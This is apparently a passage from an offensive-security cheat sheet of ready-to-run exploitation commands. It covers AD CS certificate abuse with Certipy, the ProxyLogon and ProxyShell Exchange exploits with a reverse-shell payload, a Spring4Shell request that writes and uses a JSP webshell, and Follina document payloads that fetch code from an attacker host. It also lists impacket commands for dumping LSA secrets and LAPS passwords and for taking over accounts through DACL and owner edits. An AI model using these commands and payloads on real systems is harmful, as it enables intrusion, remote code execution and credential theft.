certipy req -u 'EVILPC$'@$domain -p 'Password123!' -ca 'CA-NAME' -template 'Machine' -dc-ip $rhost
# Authenticate and get hash
certipy auth -pfx dc01.pfx -dc-ip $rhostExchange Server SSRF to RCE - Pre-auth remote code execution
# Check vulnerability
curl -k -s "https://$rhost/owa/auth/x.js" -I | grep -i 'x-owa-version'
nmap -p 443 --script "http-vuln-cve2021-26855" $rhost# Clone and exploit
git clone https://github.com/hausec/ProxyLogon && cd ProxyLogon && python3 proxylogon.py -t $rhost -e admin@$domain
# Using Metasploit
msfconsole -q -x "use exploit/windows/http/exchange_proxylogon_rce; set RHOSTS $rhost; set LHOST $lhost; exploit"Exchange Server Pre-auth RCE via multiple chained vulnerabilities
# Check autodiscover
curl -k -s "https://$rhost/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com"# Clone and exploit
git clone https://github.com/ktecv2000/ProxyShell && cd ProxyShell && python3 exploit.py -t $rhost -e admin@$domain -c "powershell -enc <BASE64_REVSHELL>"
# Using Metasploit
msfconsole -q -x "use exploit/windows/http/exchange_proxyshell_rce; set RHOSTS $rhost; set LHOST $lhost; set EMAIL admin@$domain; exploit"Spring Framework RCE via data binding to class loader
# Check vulnerability
curl -s "http://$rhost:$rport/?class.module.classLoader.URLs%5B0%5D=0" | grep -i 'error'# Write webshell (one-liner)
curl -s "http://$rhost:$rport/" -H 'prefix: <%' -H 'suffix: %>//' -H 'c: Runtime' --data 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat='
# Execute commands
curl "http://$rhost:$rport/shell.jsp?cmd=id"
# Using Nuclei
nuclei -u http://$rhost:$rport -t cves/2022/CVE-2022-22965.yamlMicrosoft MSDT Remote Code Execution via malicious Office documents
# Clone and generate payload
git clone https://github.com/JohnHammond/msdt-follina && cd msdt-follina && python3 follina.py -r $lport
# Manual payload (ms-msdt)
ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebsowseURL=http://$lhost/payload IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'<BASE64_PAYLOAD>'+[char]34+'))'))))i]&amp; echo 1"# Generate malicious docx
python3 follina.py -m command -c "powershell -e <BASE64_REVSHELL>" -o exploit.docx
# Start listener
nc -lvnp $lportDemonstrates the AD CS "bad successor" attack path
# Exploit bad successor vulnerability
impacket-badsuccessor -u $user -p '$pass' -d $domain -dc-ip $rhostExtracts LSA secrets from remote registry hives through MS-RRP
# Extract LSA secrets remotely
impacket-regsecrets $domain/$user:'$pass'@$rhostEdits local SAM password hashes offline
# Edit SAM hashes
impacket-samedit SAM -hash <new_hash> -user $usernameChecks LDAP signing status and LDAPS channel binding status
# Check LDAP security configuration
impacket-checkLDAPStatus $domain/$user:'$pass' -dc-ip $rhostExtract LAPS passwords from LDAP
impacket-GetLAPSPassword $domain/$user:'$pass' -dc-ip $rhostRead, write, remove, backup, restore ACEs in DACL
# Read DACL
impacket-dacledit $domain/$user:'$pass' -dc-ip $rhost -target $target_user -action read
# Add GenericAll
impacket-dacledit $domain/$user:'$pass' -dc-ip $rhost -target $target_user -action write -rights FullControl -principal $attacker_userAbuse WriteOwner to take ownership of objects
impacket-owneredit $domain/$user:'$pass' -dc-ip $rhost -target $target_dn -new-owner $attacker_user- Buffer Overflow - Binary exploitation fundamentals
- Port Scanning - Service/version identification for CVE discovery
- Linux PrivEsc - Dirty Cow, Dirty Pipe, kernel exploits
- Windows PrivEsc - PrintNightmare, token exploits
- Web Application Analysis - Web CVE discovery
- SQL Injection - Database CVEs
- Tools Index - Searchsploit, Metasploit
- Emergency Commands - Quick exploitation commands